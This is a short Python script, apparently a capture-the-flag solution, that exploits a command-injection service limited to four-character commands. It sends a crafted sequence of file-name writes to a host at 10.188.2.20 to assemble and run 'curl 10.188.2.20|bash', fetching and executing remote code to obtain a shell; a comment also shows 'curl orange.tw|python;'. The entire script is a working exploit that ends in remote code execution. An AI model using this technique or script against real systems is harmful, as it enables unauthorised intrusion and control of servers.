import requests
from time import sleep
from urllib import quote

payload = [
    # generate "g> ht- sl" to file "v"
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev',
    '*v>x',

    # generate "curl orange.tw|python;"
    # generate "curl 10.188.2.20|bash"
    '>\;\\', 
    '>sh\\', 
    '>ba\\', 
    '>\|\\', 
    '>20\\', 
    '>2.\\',
    '>8.\\', 
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # got shell
    'sh x', 
    'sh g', 
]


r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
    assert len(i) <= 4
    r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
    print i
    sleep(0.1)

